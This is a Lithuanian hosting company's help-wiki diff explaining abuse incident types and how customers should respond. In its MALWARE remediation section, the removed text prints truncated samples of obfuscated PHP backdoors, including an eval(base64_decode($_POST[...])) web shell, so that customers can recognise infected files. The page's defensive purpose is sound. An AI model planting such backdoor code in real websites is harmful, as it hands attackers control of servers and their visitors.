Sutarties sąlygų pažeidimai: Skirtumas tarp puslapio versijų

Iš IV pagalba klientams.
Peršokti į: navigacija, paiešką
(Naujas puslapis: ===Kas tai yra?=== Kiekvienas mūsų įmonės klientas, užsakydamas paslaugas privalo patvirtinti, kad sutinka su [https://sutartys.iv.lt/preview/ sutarties sąlygomis]. Šios ...)
 
(Rekomendacijos ir pastabos)
 
(nerodoma 8 tarpinės versijos, sukurtos 4 naudotojų)
1 eilutė: 1 eilutė:
 
===Kas tai yra?===
 
===Kas tai yra?===
  
Kiekvienas mūsų įmonės klientas, užsakydamas paslaugas privalo patvirtinti, kad sutinka su [https://sutartys.iv.lt/preview/ sutarties sąlygomis]. Šios taisyklės apibrėžia Vykdytojo (mūsų) ir Užsakovo (kliento) teises, pareigas bei atsakomybes sudarant ir vykdant sutartį. Užsakovui pažeidus bent vieną sutarties sąlygą yra fiksuojamas pažeidimas, suteikiant ribotą laikotarpį pažeidimo priežastims pašalinti ir imtis visų įmanomų priemonių, kad tokia situacija nepasikartotų ateityje. Problemos šalinimo laikotarpis priklauso nuo pažeidimo tipo ir veiklos vykdymo mąsto, bendru atveju nuo vienos iki septynių dienų.
+
Internete, kaip ir kasdieniniame gyvenime, nuolat vykdomi įvairaus tipo pažeidimai nesilaikant nustatytų taisyklių. Tokiais veiksmais siekiama gauti naudos pasinaudojant neleistinomis priemonėmis. Ne išimtis ir mūsų teikiamos paslaugos – pasitaiko atvejų, kai įvairaus tipo pažeidimai atliekami pasinaudojant serverio resursais.
 +
 
 +
Internetiniai, robotai pasinaudodami nesaugia kontaktų forma, siunčia SPAM tipo laiškus atsitiktiniams gavėjams; pasinaudojant nesaugia programine įranga į talpinimo planą įkeliamas virusas, kuris gali platinti žalingą kodą svetainės lankytojų kompiuteriuose; patalpinamas apgaulingas turinys svetainėje su tikslu pasisavinti svarbius svetainės lankytojų prisijungimų duomenis – tai yra tik dalis pažeidimų, kurie vykdomi pasinaudojant serverio resursus. Dažniausiai šie veiksmai atliekami klientui net nepastebint. Kadangi tokia veikla turi įtakos mūsų paslaugų sklandžiam veikimui, mes informuojame paslaugos savininką nurodydami, kad buvo įvykdytas sutarties sąlygų pažeidimas pasinaudojant jų turima paslauga.
 +
 
 +
Kiekvienas mūsų įmonės klientas, užsakydamas paslaugas privalo patvirtinti, kad sutinka su [https://sutartys.iv.lt/preview/ sutarties sąlygomis]. Šios taisyklės apibrėžia Vykdytojo (mūsų) ir Užsakovo (kliento) teises, pareigas bei atsakomybes sudarant ir vykdant sutartį. Užsakovui pažeidus bent vieną sutarties sąlygą yra fiksuojamas pažeidimas, suteikiant ribotą laikotarpį pažeidimo priežastims pašalinti ir imtis visų įmanomų priemonių, kad tokia situacija nepasikartotų ateityje. Problemos šalinimo laikotarpis priklauso nuo pažeidimo tipo ir veiklos vykdymo mąsto, bendru atveju nuo vienos iki septynių dienų.  
  
 
Pažeidimai dažniausiai yra fiksuojami dėl žalingos, neteisėtos veiklos vykdymo mūsų teikiamose paslaugose, gavus skundą iš trečiųjų šalių į tam skirtą el. pašto dėžutę [mailto:abuse@iv.lt abuse@iv.lt] arba remiantis serverių tarnybų išrašais, patvirtinančiais kenkėjiškos veiklos vykdymo aplinkybes. Incidentas gali būti fiksuojamas, tik esant įrodymams ir/arba skundui apie sutarties sąlygų nesilaikymą.
 
Pažeidimai dažniausiai yra fiksuojami dėl žalingos, neteisėtos veiklos vykdymo mūsų teikiamose paslaugose, gavus skundą iš trečiųjų šalių į tam skirtą el. pašto dėžutę [mailto:abuse@iv.lt abuse@iv.lt] arba remiantis serverių tarnybų išrašais, patvirtinančiais kenkėjiškos veiklos vykdymo aplinkybes. Incidentas gali būti fiksuojamas, tik esant įrodymams ir/arba skundui apie sutarties sąlygų nesilaikymą.
  
===Kokių tipų būna pažeidimai?===
+
===Ką daryti?===
 +
 
 +
Jeigu gavote iš mūsų el. laišką ar (ir) SMS žinutę apie fiksuotą pražeidimą visų pirma prisijunkite prie klientų sistemos. Pažymėtina, kad dėl pažeidimų nėra konsultuojama telefonu, el. paštu ar inicijavus pokalbį gyvai (chat) – bendravimas vykdomas tik klientų sistemoje. Prisijungę prie klientų sistemos matysite pranešimą raudoname fone ir žemiau pateiktą nuorodą '''Peržiūrėti pažeidimus ir pateikti atsakymą'''. Atsidariusiame lange matysite šią lentelę:
 +
 
 +
[[Vaizdas:Tablea.png|800px]]
  
* '''SPAM''' - incidentai, susiję su nepageidaujamų el. laiškų siuntimu per mūsų serverius arba netiesiogiai dalyvaujant SPAM veikloje, t.y. el. laiškuose reklamuojant mūsų serveriuose talpinamas svetaines ar el. pašto adresus. Pastaruoju atveju el. laiškų siuntimas gali būti vykdomas per trečiųjų šalių serverius, tačiau laiško turinyje ir/ar antraštėse bus aptinkamas domenas. Prie šių pažeidimų yra priskiriami ir atvejai, kai nesusaugojus el. pašto dėžučių prisijungimo duomenų, prieiga prie dėžučių yra suteikiama trečiosioms šalims.
 
  
* '''MALWARE''' - šie atvejai yra susiję su žalingu programiniu kodu, kuris į klientų svetaines buvo įkeltas atspėjus ar nutekinus FTP prisijungimo duomenis, arba pasinaudojus svetainės programiniame kode esančiomis saugumo spragomis. Pastaruoju atveju dažniausiai svetainės nulaužimo priežastimi tampa laiku neatnaujinama programinė įranga (turinio valdymo sistemos, papildomai įdiegti įskiepiai ir dizaino temos). Žalingas programinis kodas gali atlikti įvairius veiksmus - svetainės lankytojus peradresuoti į kitus išorinius puslapius, programiniu būdu siųsti SPAM tipo pranešimus, užkrėsti lankytojų kompiuterius žalinga programine įranga  ir pan.
+
Aktyvaus pažeidimo lentelė:
  
* '''PHISHING''' - pažeidimo tipas, kuomet apgaulės būdu yra renkami lankytojų prisijungimo duomenys. Dažniausiai šiam tikslui yra sukuriami atskiri svetainės puslapiai, klaidinančiai panašūs į kitas oficialias bankų, atsiskaitymo sistemų, socialinių tinklų ir pan. svetaines. Nuorodos į tokius puslapius gali būti išplatintos el. paštu, forumuose, kitose svetainėse.
+
* '''Pažeidimas''' – nurodomas pažeidimo tipas bei numeris. Plačiau apie tipus kalbėsime sekančioje straipsnio dalyje.
 +
* '''Paslauga''' – konkreti Jūsų turima paslauga, kuriai fiksuotas pažeidimas.
 +
* '''Terminas''' – data iki kurios turite pateikti atsakymą į pažeidimą. Šis terminas yra ypač svarbus – jeigu nesulauksime atsakymo apie atliktus ar vykdomus darbus iki nurodyto termino, paslauga bus automatiškai išjungta ir įjungta tik sulaukus atsakymo bei pažeidimus sprendžiančiam specialistui peržiūrėjus situaciją.
 +
* '''Atsakyta''' – jeigu jau esate gavę papildomą atsakymą iš mūsų pažeidimų specialisto, nurodoma pateikto atsakymo data.
 +
* '''Uždaryta''' – specialistui įvertinus, kad sutarties sąlygų pažeidimas jau pašalintas, šiame laukelyje nurodoma pažeidimo uždarymo data.
 +
* '''Vertinimas''' – užbaigus pažeidimą šiame laukelyje atsiras nuoroda, kurioje galėsite pateikti savo atsiliepimą apie pažeidimo sprendimo metu suteiktą informaciją bei nurodyti papildomus pastebėjimus ar komentarus.
  
* '''ABUSE''' - daugiau bendro pobūdžio pažeidimų tipas, kuris fiksuojamas gavus skundą dėl nepageidaujamo, autorines teises pažeidžiančio turinio svetainėse, nelegalaus "Facebook" "Like" rinkimo, suteiktų serverio resursų viršijimo arba neproporcingo naudojimo, kai tai įtakoja bendro serverio ar mazgo stabilumą.
+
Pasirinkus Pažeidimas stulpelyje esančią nuorodą Jums atsidarys puslapis, kuriame matysite skundo informaciją, pateiktą skiltyje „Papildoma informacija“ bei bendrą informaciją apie patį pažeidimo tipą. Tam, kad būtų aiškiau, kokią vykdomą veiklą pastebėjome mūsų paslaugoje. Žemiau esančioje skiltyje '''Kokių tipų būna pažeidimai?''' pateikiame trumpus dažniausiai fiksuojamų pažeidimų aprašymus.
  
* '''DDOS''' - šie pažeidimai fiksuojami, kuomet į kliento svetainę ar serverį yra nukreipta DDoS tipo ataka, t.y. siunčiamas ypač didelis kiekis įvairių užklausų iš skirtingų įrenginių, siekiant sutrikdyti svetainės ar serverio veikimą. Dažniausiai dėl atakos mąsto yra sutrikdomas ir kitų svetainių (bendro naudojimo serveriuose) ar serverių (bendrame mazge arba net duomenų centre) veikimas, todėl fiksavus incidentą, neretai yra priimamas sprendimas laikinai išjungti atakuojamą svetainę (serverį) arba apriboti užsienio duomenų srauto pralaidumą.
+
Nepaisant to, koks pažeidimo tipas buvo fiksuotas Jūsų paslaugai, rekomenduojame nedelsiant perduoti informaciją savo svetainės programuotojams ar paslaugos administratoriams. Sekite pažeidimo statusą iki tol, kol situacija bus uždaryta, nes kitu atveju – nesulaukus atsakymo ar patikslinimo – paslauga gali būti išjungta. Jeigu pažeidimą pašalinote ar tai atliko Jūsų administratorius, būtinai apie tai informuokite mus pateikdami atsakymą klientų sistemoje. Jeigu ir pasitarus su administratoriais bei peržiūrėjus informaciją mūsų pagalbos straipsnyje, nežinosite, kokių veiksmų reikėtų imtis – pateikite visus kylančius klausimus atsakydami į pažeidimą. Stengsimės pateikti detalius atsakymus į visus klausimus ir padėti kaip įmanoma greičiau išspręsti susiklosčiusią situaciją.
  
* '''ATTACK''' - incidentai, kurių metu iš mūsų serveriuose talpinamų svetainių yra vykdomos atakos į išorines svetaines ar serverius. Tam gali būti pasitelkiamas serveryje įkeltas programinis kodas, kuriam instrukcijos yra perduodamos nuotoliniu būdu.
+
===Kokių tipų būna pažeidimai?===
  
* '''OPENRESOLVER''' - specifinis pažeidimo tipas, susijęs su saugumo spraga, esančia dedikuotų (savarankiškai administruojamų) serverių DNS tarnybose.
+
{| role="presentation" class="wikitable mw-collapsible mw-collapsed"
 +
|<strong>Pažeidimų tipai</strong>
 +
|-
 +
| * '''SPAM''' - incidentai, susiję su nepageidaujamų el. laiškų siuntimu per mūsų serverius arba netiesiogiai dalyvaujant SPAM veikloje, t.y. el. laiškuose reklamuojant mūsų serveriuose talpinamas svetaines ar el. pašto adresus. Pastaruoju atveju el. laiškų siuntimas gali būti vykdomas per trečiųjų šalių serverius, tačiau laiško turinyje ir/ar antraštėse bus aptinkamas domenas. Prie šių pažeidimų yra priskiriami ir atvejai, kai nesusaugojus el. pašto dėžučių prisijungimo duomenų, prieiga prie dėžučių yra suteikiama trečiosioms šalims.
 +
|-
 +
| * '''MALWARE''' - šie atvejai yra susiję su žalingu programiniu kodu, kuris į klientų svetaines buvo įkeltas atspėjus ar nutekinus FTP prisijungimo duomenis, arba pasinaudojus svetainės programiniame kode esančiomis saugumo spragomis. Pastaruoju atveju dažniausiai svetainės nulaužimo priežastimi tampa laiku neatnaujinama programinė įranga (turinio valdymo sistemos, papildomai įdiegti įskiepiai ir dizaino temos). Žalingas programinis kodas gali atlikti įvairius veiksmus - svetainės lankytojus peradresuoti į kitus išorinius puslapius, programiniu būdu siųsti SPAM tipo pranešimus, užkrėsti lankytojų kompiuterius žalinga programine įranga  ir pan.
 +
|-
 +
| * '''PHISHING''' - pažeidimo tipas, kuomet apgaulės būdu yra renkami lankytojų prisijungimo duomenys. Dažniausiai šiam tikslui yra sukuriami atskiri svetainės puslapiai, klaidinančiai panašūs į kitas oficialias bankų, atsiskaitymo sistemų, socialinių tinklų ir pan. svetaines. Nuorodos į tokius puslapius gali būti išplatintos el. paštu, forumuose, kitose svetainėse.
 +
|-
 +
| * '''ABUSE''' - daugiau bendro pobūdžio pažeidimų tipas, kuris fiksuojamas gavus skundą dėl nepageidaujamo, autorines teises pažeidžiančio turinio svetainėse, nelegalaus "Facebook" "Like" rinkimo, suteiktų serverio resursų viršijimo arba neproporcingo naudojimo, kai tai įtakoja bendro serverio ar mazgo stabilumą.
 +
|-
 +
| * '''DDOS''' - šie pažeidimai fiksuojami, kuomet į kliento svetainę ar serverį yra nukreipta DDoS tipo ataka, t.y. siunčiamas ypač didelis kiekis įvairių užklausų iš skirtingų įrenginių, siekiant sutrikdyti svetainės ar serverio veikimą. Dažniausiai dėl atakos mąsto yra sutrikdomas ir kitų svetainių (bendro naudojimo serveriuose) ar serverių (bendrame mazge arba net duomenų centre) veikimas, todėl fiksavus incidentą, neretai yra priimamas sprendimas laikinai išjungti atakuojamą svetainę (serverį) arba apriboti užsienio duomenų srauto pralaidumą.
 +
|-
 +
| * '''ATTACK''' - incidentai, kurių metu iš mūsų serveriuose talpinamų svetainių yra vykdomos atakos į išorines svetaines ar serverius. Tam gali būti pasitelkiamas serveryje įkeltas programinis kodas, kuriam instrukcijos yra perduodamos nuotoliniu būdu.
 +
|-
 +
| * '''OPENRESOLVER''' - specifinis pažeidimo tipas, susijęs su saugumo spraga, esančia dedikuotų (savarankiškai administruojamų) serverių DNS tarnybose.
 +
|}
  
 
===Kaip reaguoti gavus pranešimą apie fiksuotą pažeidimą?===
 
===Kaip reaguoti gavus pranešimą apie fiksuotą pažeidimą?===
  
Apie fiksuotą sutarties sąlygų pažeidimą klientas visada yra informuojamas kontaktiniu el. paštu, taip pat SMS pranešimu į mobilųjį telefoną. Pažeidimo šalinimas susideda iš kelių esminių etapų - labai svarbu:
+
{| role="presentation" class="wikitable mw-collapsible mw-collapsed"
 +
|<strong>Reikalingi veiksmai</strong>
 +
|-
 +
| Apie fiksuotą sutarties sąlygų pažeidimą klientas visada yra informuojamas kontaktiniu el. paštu, taip pat SMS pranešimu į mobilųjį telefoną. Pažeidimo šalinimas susideda iš kelių esminių etapų - labai svarbu:
  
 
* prisijungti į [https://klientams.iv.lt/ klientų sistemą] ir susipažinti su visa pateikta informacija apie incidentą - tai gali būti serverio tarnybos išrašas, gauto skundo el. paštu tekstas, kita susijusi ir pažeidimą įrodanti informacija. Taip pat labai svarbu atkreipti dėmesį į datą, iki kurios būtina pateikti atsakymą į pažeidimą. Jeigu iki termino pabaigos atsakymas nėra gaunamas, paslauga yra išjungiama.
 
* prisijungti į [https://klientams.iv.lt/ klientų sistemą] ir susipažinti su visa pateikta informacija apie incidentą - tai gali būti serverio tarnybos išrašas, gauto skundo el. paštu tekstas, kita susijusi ir pažeidimą įrodanti informacija. Taip pat labai svarbu atkreipti dėmesį į datą, iki kurios būtina pateikti atsakymą į pažeidimą. Jeigu iki termino pabaigos atsakymas nėra gaunamas, paslauga yra išjungiama.
31 eilutė: 62 eilutė:
  
 
'''SVARBU:''' sutarties sąlygų pažeidimai yra sprendžiami tik klientų sistemoje, tam skirtoje [https://klientams.iv.lt/abuses.php skiltyje]. Su pažeidimu susijusiais klausimais galima konsultuotis tik minėtoje skiltyje - informacija apie pažeidimus nėra teikiama bendruoju įmonės telefonu, taip pat el. paštu. Iškilus neaiškumams, pritrūkus informacijos apie problemos šalinimą - visada galite atsakyti į pažeidimą ir rūpimus klausimus užduoti pažeidimus administruojančiam darbuotojui.
 
'''SVARBU:''' sutarties sąlygų pažeidimai yra sprendžiami tik klientų sistemoje, tam skirtoje [https://klientams.iv.lt/abuses.php skiltyje]. Su pažeidimu susijusiais klausimais galima konsultuotis tik minėtoje skiltyje - informacija apie pažeidimus nėra teikiama bendruoju įmonės telefonu, taip pat el. paštu. Iškilus neaiškumams, pritrūkus informacijos apie problemos šalinimą - visada galite atsakyti į pažeidimą ir rūpimus klausimus užduoti pažeidimus administruojančiam darbuotojui.
 +
|}
  
 
===Kodėl buvo fiksuotas pažeidimas, jeigu jokių kenkėjiškų veiksmų neatlikau?===
 
===Kodėl buvo fiksuotas pažeidimas, jeigu jokių kenkėjiškų veiksmų neatlikau?===
  
Pagal [https://sutartys.iv.lt/preview/ sutartinius įsipareigojimus], kiekvienas mūsų įmonės klientas turi saugoti jam suteiktus prisijungimo duomenis, taip pat užkirsti kelią suteiktais serverių resursais naudotis trečiosioms šalims. Kai kuriais atvejais pažeidimas gali atsirasti:
+
{| role="presentation" class="wikitable mw-collapsible mw-collapsed"
 +
|<strong>Priežastys</strong>
 +
|-
 +
| Pagal [https://sutartys.iv.lt/preview/ sutartinius įsipareigojimus], kiekvienas mūsų įmonės klientas turi saugoti jam suteiktus prisijungimo duomenis, taip pat užkirsti kelią suteiktais serverių resursais naudotis trečiosioms šalims. Kai kuriais atvejais pažeidimas gali atsirasti:
  
 
* trečiosioms šalims atspėjus arba nutekinus (pvz.: kompiuterinio viruso pagalba) prisijungimo duomenis (serverio valdymo pulto, FTP, el. pašto dėžutės...);
 
* trečiosioms šalims atspėjus arba nutekinus (pvz.: kompiuterinio viruso pagalba) prisijungimo duomenis (serverio valdymo pulto, FTP, el. pašto dėžutės...);
42 eilutė: 77 eilutė:
  
 
Visais šiais atvejais pažeidimo priežastis privalo pašalinti paslaugos užsakovas arba jo įpareigotas IT specialistas. Prieš šalinant pažeidimo priežastis, galite peržiūrėti mūsų pateikiamas rekomendacijas ir pastabas.
 
Visais šiais atvejais pažeidimo priežastis privalo pašalinti paslaugos užsakovas arba jo įpareigotas IT specialistas. Prieš šalinant pažeidimo priežastis, galite peržiūrėti mūsų pateikiamas rekomendacijas ir pastabas.
 +
|}
  
 
===Rekomendacijos ir pastabos===
 
===Rekomendacijos ir pastabos===
  
====SPAM====
+
{| role="presentation" class="wikitable mw-collapsible mw-collapsed"
 
+
|<strong>SPAM</strong>
<blockquote>
+
|-
 +
| <blockquote>
 
'''1.''' Visų pirma įdėmiai peržiūrėkite [https://klientams.iv.lt/abuses.php klientų sistemos pažeidimų skiltyje] pateiktą informaciją (laiško pavyzdį, el. pašto tarnybos išrašą) ir nustatykite, ar matoma informacija yra susijusi su Jūsų iniciatyva siunčiamais el. laiškais - ar matytas el. laiško tekstas, ar Jums yra žinomas gavėjo el. pašto adresas ir pan. Jeigu laiškas iš ties buvo siųstas Jūsų iniciatyva arba su Jūsų žinia platinant reklaminio/komercinio pobūdžio informaciją - peržiūrėkite, kas yra laikoma [https://www.iv.lt/pagalba/Nepageidaujami_%28SPAM%29_lai%C5%A1kai nepageidaujamais (SPAM) laiškais].
 
'''1.''' Visų pirma įdėmiai peržiūrėkite [https://klientams.iv.lt/abuses.php klientų sistemos pažeidimų skiltyje] pateiktą informaciją (laiško pavyzdį, el. pašto tarnybos išrašą) ir nustatykite, ar matoma informacija yra susijusi su Jūsų iniciatyva siunčiamais el. laiškais - ar matytas el. laiško tekstas, ar Jums yra žinomas gavėjo el. pašto adresas ir pan. Jeigu laiškas iš ties buvo siųstas Jūsų iniciatyva arba su Jūsų žinia platinant reklaminio/komercinio pobūdžio informaciją - peržiūrėkite, kas yra laikoma [https://www.iv.lt/pagalba/Nepageidaujami_%28SPAM%29_lai%C5%A1kai nepageidaujamais (SPAM) laiškais].
 
</blockquote>
 
</blockquote>
70 eilutė: 107 eilutė:
 
'''5.''' Kilus įtarimui apie nesankcionuotą trečiųjų šalių prisijungimą prie Jūsų el. pašto dėžutės (-čių), rekomenduojame patikrinti [https://www.iv.lt/pagalba/Pa%C5%A1to_statistika el. pašto statistiką].
 
'''5.''' Kilus įtarimui apie nesankcionuotą trečiųjų šalių prisijungimą prie Jūsų el. pašto dėžutės (-čių), rekomenduojame patikrinti [https://www.iv.lt/pagalba/Pa%C5%A1to_statistika el. pašto statistiką].
 
</blockquote>
 
</blockquote>
 +
|}
  
====MALWARE====
+
{| role="presentation" class="wikitable mw-collapsible mw-collapsed"
 
+
|<strong>MALWARE</strong>
<blockquote>
+
|-
 +
| <blockquote>
 
'''1.''' Jeigu turite galimybę, patikrinkite serverio FTP tarnybos išrašą - jame matysite failų įkėlimo/parsisiuntimo atvejus, fiksuojant tikslų laiką ir IP adresą, iš kurio buvo prisijungta. Fiksuotą (-us) IP adresą (-us) galite palyginti su savo kompiuterio išoriniu IP adresu, kurį išvysite apsilankius adresu [http://ip.serveriai.lt/ ip.serveriai.lt]. Jeigu IP adresai yra skirtingi - didelė tikimybė kad prie FTP serverio su atspėtu arba nutekintu (pvz.: kompiuterinio viruso pagalba) slaptažodžiu buvo prisijungta kitų asmenų. Tokiu atveju kiek įmanoma greičiau pakeiskite FTP naudotojo slaptažodį ir nuskenuokite visus naudojamus įrenginius (iš kurių buvo jungtasi į serverį) antivirusinėmis programomis.
 
'''1.''' Jeigu turite galimybę, patikrinkite serverio FTP tarnybos išrašą - jame matysite failų įkėlimo/parsisiuntimo atvejus, fiksuojant tikslų laiką ir IP adresą, iš kurio buvo prisijungta. Fiksuotą (-us) IP adresą (-us) galite palyginti su savo kompiuterio išoriniu IP adresu, kurį išvysite apsilankius adresu [http://ip.serveriai.lt/ ip.serveriai.lt]. Jeigu IP adresai yra skirtingi - didelė tikimybė kad prie FTP serverio su atspėtu arba nutekintu (pvz.: kompiuterinio viruso pagalba) slaptažodžiu buvo prisijungta kitų asmenų. Tokiu atveju kiek įmanoma greičiau pakeiskite FTP naudotojo slaptažodį ir nuskenuokite visus naudojamus įrenginius (iš kurių buvo jungtasi į serverį) antivirusinėmis programomis.
  
98 eilutė: 137 eilutė:
 
'''6.''' Jeigu pastaruoju metu iš mūsų gavote el. laišką (-us) apie talpinimo paslaugoje [https://www.iv.lt/pagalba/Fail%C5%B3_skenavimas aptiktus žalingus failus] - peržiūrėkite visų sąraše nurodytų bylų turinį ir pašalinkite žalingą programinį kodą. Dažniausiai jį galima atpažinti, jeigu didžioji dalis fragmento yra koduota:
 
'''6.''' Jeigu pastaruoju metu iš mūsų gavote el. laišką (-us) apie talpinimo paslaugoje [https://www.iv.lt/pagalba/Fail%C5%B3_skenavimas aptiktus žalingus failus] - peržiūrėkite visų sąraše nurodytų bylų turinį ir pašalinkite žalingą programinį kodą. Dažniausiai jį galima atpažinti, jeigu didžioji dalis fragmento yra koduota:
  
<pre style="white-space: pre-wrap;">
+
[[Vaizdas:Pazeidimai_1.png]]
preg_replace("\x2F\x2E\x2A\x2F\x65","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X37d9s4zujP3XP2f2A12ZHdOn6l6Xbi2H3k0abTJp0kfSa5XtmWbU1kySPJcdJu/vcLgA+Rkuy4ndn97j3nS2cSSQRBkARJEARAtz8OmbXte8Eli1y/bcfjMEr6s4R5/TCw2Thyh217nCTTrVptPp9XB1/X4yRynYkXjKrurDZ0rhCyCr/szt//x <...>
 
</pre>
 
  
 
eilutės pradžioje yra didelis kiekis tarpo simbolių, kad daugumoje redaktorių žalingas kodas nebūtų iškart matomas po failo atidarymo:
 
eilutės pradžioje yra didelis kiekis tarpo simbolių, kad daugumoje redaktorių žalingas kodas nebūtų iškart matomas po failo atidarymo:
  
<pre style="white-space: pre-wrap;">
+
[[Vaizdas:Pazeidimai_2.png]]
<?php                                                                                  error_reporting(0);if(isset($_GET["gdtld"])){echo"[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo <...>
 
</pre>
 
  
 
naudojamos '''eval''', '''base64_decode''', '''zlib_decode''' funkcijos:
 
naudojamos '''eval''', '''base64_decode''', '''zlib_decode''' funkcijos:
  
<pre style="white-space: pre-wrap;">
+
[[Vaizdas:Pazeidimai_3.png]]
eval(base64_decode($_POST["\x63od\x65"]));}if(isset($_POST["\x74\x79pe"])&&$_POST["type"]=="\x31"){type1_send();}elseif(isset($_POST["type"])&&$_POST["t\x79\x70e"]=="2"){}elseif(isset($_POST["\x74\x79pe"]))
 
</pre>
 
  
 
Esant poreikiui, talpinimo paslaugos failus galime nuskenuoti pakartotinai - tereikia apie tai informuoti atsakant į pažeidimą klientų sistemoje.
 
Esant poreikiui, talpinimo paslaugos failus galime nuskenuoti pakartotinai - tereikia apie tai informuoti atsakant į pažeidimą klientų sistemoje.
122 eilutė: 155 eilutė:
 
'''7.''' Jeigu šalinant žalingą programinį kodą ištrynėte reikalingus svetainei duomenis (failus ar direktorijas), galite užsakyti [https://www.iv.lt/pagalba/Duomen%C5%B3_atstatymas duomenų atstatymą] iš mūsų generuojamų atsarginių kopijų.
 
'''7.''' Jeigu šalinant žalingą programinį kodą ištrynėte reikalingus svetainei duomenis (failus ar direktorijas), galite užsakyti [https://www.iv.lt/pagalba/Duomen%C5%B3_atstatymas duomenų atstatymą] iš mūsų generuojamų atsarginių kopijų.
 
</blockquote>
 
</blockquote>
 +
|}
  
====PHISHING====
+
{| role="presentation" class="wikitable mw-collapsible mw-collapsed"
 
+
|<strong>PHISHING</strong>
<blockquote>
+
|-
 +
| <blockquote>
 
'''1.''' Visų pirma įdėmiai peržiūrėkite visą [https://klientams.iv.lt/ klientų sistemoje] pateiktą informaciją - joje bus nurodomas tikslus svetainės puslapis ar sritis, kurioje yra patalpinta apgaulinga kitos svetainės kopija. Tokio pobūdžio puslapių serveryje gali būti sukurta ir daugiau, todėl peržiūrėkite visus serverio failus iš esmės ir pašalinkite visas nepageidaujamas, trečiųjų šalių įkeltas bylas.
 
'''1.''' Visų pirma įdėmiai peržiūrėkite visą [https://klientams.iv.lt/ klientų sistemoje] pateiktą informaciją - joje bus nurodomas tikslus svetainės puslapis ar sritis, kurioje yra patalpinta apgaulinga kitos svetainės kopija. Tokio pobūdžio puslapių serveryje gali būti sukurta ir daugiau, todėl peržiūrėkite visus serverio failus iš esmės ir pašalinkite visas nepageidaujamas, trečiųjų šalių įkeltas bylas.
 
</blockquote>
 
</blockquote>
140 eilutė: 175 eilutė:
 
'''4.''' Jeigu svetainių failams ir katalogams esate nustatę maksimalias prieigos teises (angl. ''permissions'') '''777''' - tai taip pat galima įvardinti kaip saugumo grėsmę, kadangi duomenų įrašymo, nuskaitymo ir vykdymo galimybė yra suteikiama visiems naudotojams (ne tik serverio ir/ar svetainės administratoriui). Paprastai svetainės failams ir katalogams, kurie gali būti pasiekiami iš išorės (pvz.: "''public_html''" direktorijoje) nerekomenduojama nustatyti didesnių prieigos teisių nei '''644''' failams ir '''755''' direktorijoms.
 
'''4.''' Jeigu svetainių failams ir katalogams esate nustatę maksimalias prieigos teises (angl. ''permissions'') '''777''' - tai taip pat galima įvardinti kaip saugumo grėsmę, kadangi duomenų įrašymo, nuskaitymo ir vykdymo galimybė yra suteikiama visiems naudotojams (ne tik serverio ir/ar svetainės administratoriui). Paprastai svetainės failams ir katalogams, kurie gali būti pasiekiami iš išorės (pvz.: "''public_html''" direktorijoje) nerekomenduojama nustatyti didesnių prieigos teisių nei '''644''' failams ir '''755''' direktorijoms.
 
</blockquote>
 
</blockquote>
 +
|}
  
====ABUSE====
+
{| role="presentation" class="wikitable mw-collapsible mw-collapsed"
 
+
|<strong>ABUSE</strong>
<blockquote>
+
|-
Jeigu sutarties sąlygų pažeidimas buvo fiksuotas [http://serveriai.lt serveriai.lt] talpinimo plane dėl neproporcingai išnaudojamų serverio resursų (pvz.: svetainė išnaudoja visus leistinus susijungimus, talpinamos MySQL duomenų bazės dydis viršija 1 GB, arba lentelių kiekis duomenų bazėje yra ypač didelis) rekomenduojame apsvarstyti galimybę persikelti į [http://hostingas.lt/ profesionalaus hostingo paslaugą]. [http://serveriai.lt/ Serveriai.lt] paslaugos veikia ''shared-hostingo'' principu, kuomet vieno fizinio serverio resursais naudojasi didesnis kiekis naudotojų. Dėl šios priežastis, bendro naudojimo serveriuose negali būti talpinamos svetainės, naudojančios serverio resursus neproporcingai (įtakojančios kitų klientų svetainių veikimą bendrame serveryje).
+
| <blockquote>
 +
Jeigu sutarties sąlygų pažeidimas buvo fiksuotas [http://serveriai.lt serveriai.lt] talpinimo plane dėl neproporcingai išnaudojamų serverio resursų (pvz.: svetainė išnaudoja visus leistinus susijungimus, talpinamos MySQL duomenų bazės dydis viršija 1 GB, arba lentelių kiekis duomenų bazėje yra ypač didelis) rekomenduojame apsvarstyti galimybę persikelti į [http://hostingas.lt/ profesionalaus hostingo paslaugą]. [http://serveriai.lt/ Serveriai.lt] paslaugos veikia ''shared-hostingo'' principu, kuomet vieno fizinio serverio resursais naudojasi didesnis kiekis naudotojų. Dėl šios priežasties, bendro naudojimo serveriuose negali būti talpinamos svetainės, naudojančios serverio resursus neproporcingai (įtakojančios kitų klientų svetainių veikimą bendrame serveryje).
  
 
</blockquote>
 
</blockquote>
 +
|}
  
====DDOS====
+
{| role="presentation" class="wikitable mw-collapsible mw-collapsed"
 
+
|<strong>DDOS</strong>
<blockquote>
+
|-
 +
| <blockquote>
 
Atakuojamai svetainei (ir visoms kitoms, talpinamoms tame pačiame serveryje) rekomenduojame įjungti [https://www.cloudflare.com/ CloudFlare] arba [http://www.incapsula.com/ Incapsula] papildomą užklausų filtravimo paslaugą. Detalią CloudFlare apsaugos pajungimo instrukciją galite rasti [https://www.iv.lt/pagalba/CloudFlare paspaudę čia].
 
Atakuojamai svetainei (ir visoms kitoms, talpinamoms tame pačiame serveryje) rekomenduojame įjungti [https://www.cloudflare.com/ CloudFlare] arba [http://www.incapsula.com/ Incapsula] papildomą užklausų filtravimo paslaugą. Detalią CloudFlare apsaugos pajungimo instrukciją galite rasti [https://www.iv.lt/pagalba/CloudFlare paspaudę čia].
 
</blockquote>
 
</blockquote>
 +
|}
  
====ATTACK====
+
{| role="presentation" class="wikitable mw-collapsible mw-collapsed"
 
+
|<strong>ATTACK</strong>
<blockquote>
+
|-
 +
| <blockquote>
 
